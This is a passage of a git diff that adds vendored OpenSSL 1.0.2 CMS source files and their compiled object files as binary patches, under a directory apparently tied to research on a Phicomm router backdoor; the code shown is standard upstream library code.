+    ASN1_OCTET_STRING *os = NULL;
+
+    /* Get original receipt request */
+
+    /* Get original receipt request details */
+
+    if (CMS_get1_ReceiptRequest(si, &rr) <= 0) {
+        CMSerr(CMS_F_CMS_ENCODE_RECEIPT, CMS_R_NO_RECEIPT_REQUEST);
+        goto err;
+    }
+
+    /* Get original content type */
+
+    ctype = CMS_signed_get0_data_by_OBJ(si,
+                                        OBJ_nid2obj(NID_pkcs9_contentType),
+                                        -3, V_ASN1_OBJECT);
+    if (!ctype) {
+        CMSerr(CMS_F_CMS_ENCODE_RECEIPT, CMS_R_NO_CONTENT_TYPE);
+        goto err;
+    }
+
+    rct.version = 1;
+    rct.contentType = ctype;
+    rct.signedContentIdentifier = rr->signedContentIdentifier;
+    rct.originatorSignatureValue = si->signature;
+
+    os = ASN1_item_pack(&rct, ASN1_ITEM_rptr(CMS_Receipt), NULL);
+
+ err:
+    if (rr)
+        CMS_ReceiptRequest_free(rr);
+
+    return os;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_ess.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_ess.o
new file mode 100644
index 0000000000000000000000000000000000000000..327456d792f8b659fa409c4b02b7063cff338d0d
GIT binary patch
literal 7560
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
M?DneJyMO$D03vRzQUCw|

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_io.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_io.c
new file mode 100644
index 0000000..ec51f8e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_io.c
@@ -0,0 +1,133 @@
+/* crypto/cms/cms_io.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/err.h>
+#include <openssl/pem.h>
+#include "cms.h"
+#include "cms_lcl.h"
+
+int CMS_stream(unsigned char ***boundary, CMS_ContentInfo *cms)
+{
+    ASN1_OCTET_STRING **pos;
+    pos = CMS_get0_content(cms);
+    if (!pos)
+        return 0;
+    if (!*pos)
+        *pos = ASN1_OCTET_STRING_new();
+    if (*pos) {
+        (*pos)->flags |= ASN1_STRING_FLAG_NDEF;
+        (*pos)->flags &= ~ASN1_STRING_FLAG_CONT;
+        *boundary = &(*pos)->data;
+        return 1;
+    }
+    CMSerr(CMS_F_CMS_STREAM, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+CMS_ContentInfo *d2i_CMS_bio(BIO *bp, CMS_ContentInfo **cms)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(CMS_ContentInfo), bp, cms);
+}
+
+int i2d_CMS_bio(BIO *bp, CMS_ContentInfo *cms)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(CMS_ContentInfo), bp, cms);
+}
+
+IMPLEMENT_PEM_rw_const(CMS, CMS_ContentInfo, PEM_STRING_CMS, CMS_ContentInfo)
+
+BIO *BIO_new_CMS(BIO *out, CMS_ContentInfo *cms)
+{
+    return BIO_new_NDEF(out, (ASN1_VALUE *)cms,
+                        ASN1_ITEM_rptr(CMS_ContentInfo));
+}
+
+/* CMS wrappers round generalised stream and MIME routines */
+
+int i2d_CMS_bio_stream(BIO *out, CMS_ContentInfo *cms, BIO *in, int flags)
+{
+    return i2d_ASN1_bio_stream(out, (ASN1_VALUE *)cms, in, flags,
+                               ASN1_ITEM_rptr(CMS_ContentInfo));
+}
+
+int PEM_write_bio_CMS_stream(BIO *out, CMS_ContentInfo *cms, BIO *in,
+                             int flags)
+{
+    return PEM_write_bio_ASN1_stream(out, (ASN1_VALUE *)cms, in, flags,
+                                     "CMS", ASN1_ITEM_rptr(CMS_ContentInfo));
+}
+
+int SMIME_write_CMS(BIO *bio, CMS_ContentInfo *cms, BIO *data, int flags)
+{
+    STACK_OF(X509_ALGOR) *mdalgs;
+    int ctype_nid = OBJ_obj2nid(cms->contentType);
+    int econt_nid = OBJ_obj2nid(CMS_get0_eContentType(cms));
+    if (ctype_nid == NID_pkcs7_signed)
+        mdalgs = cms->d.signedData->digestAlgorithms;
+    else
+        mdalgs = NULL;
+
+    return SMIME_write_ASN1(bio, (ASN1_VALUE *)cms, data, flags,
+                            ctype_nid, econt_nid, mdalgs,
+                            ASN1_ITEM_rptr(CMS_ContentInfo));
+}
+
+CMS_ContentInfo *SMIME_read_CMS(BIO *bio, BIO **bcont)
+{
+    return (CMS_ContentInfo *)SMIME_read_ASN1(bio, bcont,
+                                              ASN1_ITEM_rptr
+                                              (CMS_ContentInfo));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_io.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_io.o
new file mode 100644
index 0000000000000000000000000000000000000000..cf537e77d69bbc900d9f1a2238c959f73f54a182
GIT binary patch
literal 4680
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
B|0Dna

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_kari.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_kari.c
new file mode 100644
index 0000000..f8a6cba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_kari.c
@@ -0,0 +1,461 @@
+/* crypto/cms/cms_kari.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include <openssl/rand.h>
+#include <openssl/aes.h>
+#include "cms_lcl.h"
+#include "asn1_locl.h"
+
+DECLARE_ASN1_ITEM(CMS_KeyAgreeRecipientInfo)
+DECLARE_ASN1_ITEM(CMS_RecipientEncryptedKey)
+DECLARE_ASN1_ITEM(CMS_OriginatorPublicKey)
+
+/* Key Agreement Recipient Info (KARI) routines */
+
+int CMS_RecipientInfo_kari_get0_alg(CMS_RecipientInfo *ri,
+                                    X509_ALGOR **palg,
+                                    ASN1_OCTET_STRING **pukm)
+{
+    if (ri->type != CMS_RECIPINFO_AGREE) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KARI_GET0_ALG,
+               CMS_R_NOT_KEY_AGREEMENT);
+        return 0;
+    }
+    if (palg)
+        *palg = ri->d.kari->keyEncryptionAlgorithm;
+    if (pukm)
+        *pukm = ri->d.kari->ukm;
+    return 1;
+}
+
+/* Retrieve recipient encrypted keys from a kari */
+
+STACK_OF(CMS_RecipientEncryptedKey)
+*CMS_RecipientInfo_kari_get0_reks(CMS_RecipientInfo *ri)
+{
+    if (ri->type != CMS_RECIPINFO_AGREE) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KARI_GET0_REKS,
+               CMS_R_NOT_KEY_AGREEMENT);
+        return NULL;
+    }
+    return ri->d.kari->recipientEncryptedKeys;
+}
+
+int CMS_RecipientInfo_kari_get0_orig_id(CMS_RecipientInfo *ri,
+                                        X509_ALGOR **pubalg,
+                                        ASN1_BIT_STRING **pubkey,
+                                        ASN1_OCTET_STRING **keyid,
+                                        X509_NAME **issuer,
+                                        ASN1_INTEGER **sno)
+{
+    CMS_OriginatorIdentifierOrKey *oik;
+    if (ri->type != CMS_RECIPINFO_AGREE) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KARI_GET0_ORIG_ID,
+               CMS_R_NOT_KEY_AGREEMENT);
+        return 0;
+    }
+    oik = ri->d.kari->originator;
+    if (issuer)
+        *issuer = NULL;
+    if (sno)
+        *sno = NULL;
+    if (keyid)
+        *keyid = NULL;
+    if (pubalg)
+        *pubalg = NULL;
+    if (pubkey)
+        *pubkey = NULL;
+    if (oik->type == CMS_OIK_ISSUER_SERIAL) {
+        if (issuer)
+            *issuer = oik->d.issuerAndSerialNumber->issuer;
+        if (sno)
+            *sno = oik->d.issuerAndSerialNumber->serialNumber;
+    } else if (oik->type == CMS_OIK_KEYIDENTIFIER) {
+        if (keyid)
+            *keyid = oik->d.subjectKeyIdentifier;
+    } else if (oik->type == CMS_OIK_PUBKEY) {
+        if (pubalg)
+            *pubalg = oik->d.originatorKey->algorithm;
+        if (pubkey)
+            *pubkey = oik->d.originatorKey->publicKey;
+    } else
+        return 0;
+    return 1;
+}
+
+int CMS_RecipientInfo_kari_orig_id_cmp(CMS_RecipientInfo *ri, X509 *cert)
+{
+    CMS_OriginatorIdentifierOrKey *oik;
+    if (ri->type != CMS_RECIPINFO_AGREE) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_KARI_ORIG_ID_CMP,
+               CMS_R_NOT_KEY_AGREEMENT);
+        return -2;
+    }
+    oik = ri->d.kari->originator;
+    if (oik->type == CMS_OIK_ISSUER_SERIAL)
+        return cms_ias_cert_cmp(oik->d.issuerAndSerialNumber, cert);
+    else if (oik->type == CMS_OIK_KEYIDENTIFIER)
+        return cms_keyid_cert_cmp(oik->d.subjectKeyIdentifier, cert);
+    return -1;
+}
+
+int CMS_RecipientEncryptedKey_get0_id(CMS_RecipientEncryptedKey *rek,
+                                      ASN1_OCTET_STRING **keyid,
+                                      ASN1_GENERALIZEDTIME **tm,
+                                      CMS_OtherKeyAttribute **other,
+                                      X509_NAME **issuer, ASN1_INTEGER **sno)
+{
+    CMS_KeyAgreeRecipientIdentifier *rid = rek->rid;
+    if (rid->type == CMS_REK_ISSUER_SERIAL) {
+        if (issuer)
+            *issuer = rid->d.issuerAndSerialNumber->issuer;
+        if (sno)
+            *sno = rid->d.issuerAndSerialNumber->serialNumber;
+        if (keyid)
+            *keyid = NULL;
+        if (tm)
+            *tm = NULL;
+        if (other)
+            *other = NULL;
+    } else if (rid->type == CMS_REK_KEYIDENTIFIER) {
+        if (keyid)
+            *keyid = rid->d.rKeyId->subjectKeyIdentifier;
+        if (tm)
+            *tm = rid->d.rKeyId->date;
+        if (other)
+            *other = rid->d.rKeyId->other;
+        if (issuer)
+            *issuer = NULL;
+        if (sno)
+            *sno = NULL;
+    } else
+        return 0;
+    return 1;
+}
+
+int CMS_RecipientEncryptedKey_cert_cmp(CMS_RecipientEncryptedKey *rek,
+                                       X509 *cert)
+{
+    CMS_KeyAgreeRecipientIdentifier *rid = rek->rid;
+    if (rid->type == CMS_REK_ISSUER_SERIAL)
+        return cms_ias_cert_cmp(rid->d.issuerAndSerialNumber, cert);
+    else if (rid->type == CMS_REK_KEYIDENTIFIER)
+        return cms_keyid_cert_cmp(rid->d.rKeyId->subjectKeyIdentifier, cert);
+    else
+        return -1;
+}
+
+int CMS_RecipientInfo_kari_set0_pkey(CMS_RecipientInfo *ri, EVP_PKEY *pk)
+{
+    EVP_PKEY_CTX *pctx;
+    CMS_KeyAgreeRecipientInfo *kari = ri->d.kari;
+    if (kari->pctx) {
+        EVP_PKEY_CTX_free(kari->pctx);
+        kari->pctx = NULL;
+    }
+    if (!pk)
+        return 1;
+    pctx = EVP_PKEY_CTX_new(pk, NULL);
+    if (!pctx || !EVP_PKEY_derive_init(pctx))
+        goto err;
+    kari->pctx = pctx;
+    return 1;
+ err:
+    if (pctx)
+        EVP_PKEY_CTX_free(pctx);
+    return 0;
+}
+
+EVP_CIPHER_CTX *CMS_RecipientInfo_kari_get0_ctx(CMS_RecipientInfo *ri)
+{
+    if (ri->type == CMS_RECIPINFO_AGREE)
+        return &ri->d.kari->ctx;
+    return NULL;
+}
+
+/*
+ * Derive KEK and decrypt/encrypt with it to produce either the original CEK
+ * or the encrypted CEK.
+ */
+
+static int cms_kek_cipher(unsigned char **pout, size_t *poutlen,
+                          const unsigned char *in, size_t inlen,
+                          CMS_KeyAgreeRecipientInfo *kari, int enc)
+{
+    /* Key encryption key */
+    unsigned char kek[EVP_MAX_KEY_LENGTH];
+    size_t keklen;
+    int rv = 0;
+    unsigned char *out = NULL;
+    int outlen;
+    keklen = EVP_CIPHER_CTX_key_length(&kari->ctx);
+    if (keklen > EVP_MAX_KEY_LENGTH)
+        return 0;
+    /* Derive KEK */
+    if (EVP_PKEY_derive(kari->pctx, kek, &keklen) <= 0)
+        goto err;
+    /* Set KEK in context */
+    if (!EVP_CipherInit_ex(&kari->ctx, NULL, NULL, kek, NULL, enc))
+        goto err;
+    /* obtain output length of ciphered key */
+    if (!EVP_CipherUpdate(&kari->ctx, NULL, &outlen, in, inlen))
+        goto err;
+    out = OPENSSL_malloc(outlen);
+    if (!out)
+        goto err;
+    if (!EVP_CipherUpdate(&kari->ctx, out, &outlen, in, inlen))
+        goto err;
+    *pout = out;
+    *poutlen = (size_t)outlen;
+    rv = 1;
+
+ err:
+    OPENSSL_cleanse(kek, keklen);
+    if (!rv && out)
+        OPENSSL_free(out);
+    EVP_CIPHER_CTX_cleanup(&kari->ctx);
+    EVP_PKEY_CTX_free(kari->pctx);
+    kari->pctx = NULL;
+    return rv;
+}
+
+int CMS_RecipientInfo_kari_decrypt(CMS_ContentInfo *cms,
+                                   CMS_RecipientInfo *ri,
+                                   CMS_RecipientEncryptedKey *rek)
+{
+    int rv = 0;
+    unsigned char *enckey = NULL, *cek = NULL;
+    size_t enckeylen;
+    size_t ceklen;
+    CMS_EncryptedContentInfo *ec;
+    enckeylen = rek->encryptedKey->length;
+    enckey = rek->encryptedKey->data;
+    /* Setup all parameters to derive KEK */
+    if (!cms_env_asn1_ctrl(ri, 1))
+        goto err;
+    /* Attempt to decrypt CEK */
